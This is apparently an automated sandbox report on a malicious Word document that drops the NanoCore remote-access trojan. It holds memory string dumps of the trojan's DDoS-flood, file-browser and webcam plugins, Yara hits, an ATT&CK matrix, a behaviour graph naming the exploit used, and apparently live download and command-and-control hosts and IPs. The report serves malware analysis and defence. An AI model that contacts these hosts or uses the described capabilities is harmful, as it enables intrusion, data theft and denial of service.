dStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Windows Management Instrumentation      		1
      Scheduled Task/Job      		312
      Process Injection      		11
      Disable or Modify Tools      		11
      Input Capture      		2
      File and Directory Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium12
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts13
      Exploitation for Client Execution      		Boot or Logon Initialization Scripts1
      Scheduled Task/Job      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory13
      System Information Discovery      		Remote Desktop Protocol11
      Input Capture      		Exfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)21
      Obfuscated Files or Information      		Security Account Manager211
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Standard Port      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		Logon Script (Mac)Logon Script (Mac)13
      Software Packing      		NTDS2
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Remote Access Software      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
      Masquerading      		LSA Secrets31
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size Limits2
      Non-Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common31
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 Channel122
      Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items312
      Process Injection      		DCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 558855 Sample: DOC_MDR0307_019.doc Startdate: 24/01/2022 Architecture: WINDOWS Score: 100 55 vijayikohli1.bounceme.net 2->55 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 22 other signatures 2->67 9 EQNEDT32.EXE 11 2->9         started        14 WINWORD.EXE 291 19 2->14         started        16 taskeng.exe 1 2->16         started        18 smtpsvc.exe 2->18         started        signatures3 process4 dnsIp5 57 paxz.tk 2.58.149.41, 49165, 80 GBTCLOUDUS Netherlands 9->57 45 C:\Users\user\AppData\...\plugmancdht5461.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\...\plugmanzx[1].exe, PE32 9->47 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->77 20 plugmancdht5461.exe 3 9->20         started        49 ~WRF{6F85BCFE-F7E6...1-5E2AC6A32603}.tmp, Composite 14->49 dropped 24 RegSvcs.exe 16->24         started        26 smtpsvc.exe 16->26         started        file6 signatures7 process8 file9 41 C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, PE32 20->41 dropped 43 C:\Users\user\AppData\Local\...\tmp41F1.tmp, XML 20->43 dropped 69 Multi AV Scanner detection for dropped file 20->69 71 Machine Learning detection for dropped file 20->71 73 Uses schtasks.exe or at.exe to add and modify task schedules 20->73 75 4 other signatures 20->75 28 RegSvcs.exe 1 12 20->28         started        33 powershell.exe 6 20->33         started        35 schtasks.exe 20->35         started        signatures10 process11 dnsIp12 59 vijayikohli1.bounceme.net 103.153.78.234, 3132, 49166, 49167 TWIDC-AS-APTWIDCLimitedHK unknown 28->59 51 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 28->51 dropped 53 C:\Program Files (x86)\...\smtpsvc.exe, PE32 28->53 dropped 79 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->79 37 schtasks.exe 28->37         started        39 schtasks.exe 28->39         started        file13 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      DOC_MDR0307_019.doc23%ReversingLabsDocument-Office.Exploit.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp100%AviraEXP/CVE-2017-11882.Gen
      C:\Users\user\AppData\Roaming\plugmancdht5461.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ZdNnwVcb.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe100%Joe Sandbox ML
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
      C:\Users\user\AppData\Roaming\ZdNnwVcb.exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
      C:\Users\user\AppData\Roaming\plugmancdht5461.exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      9.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
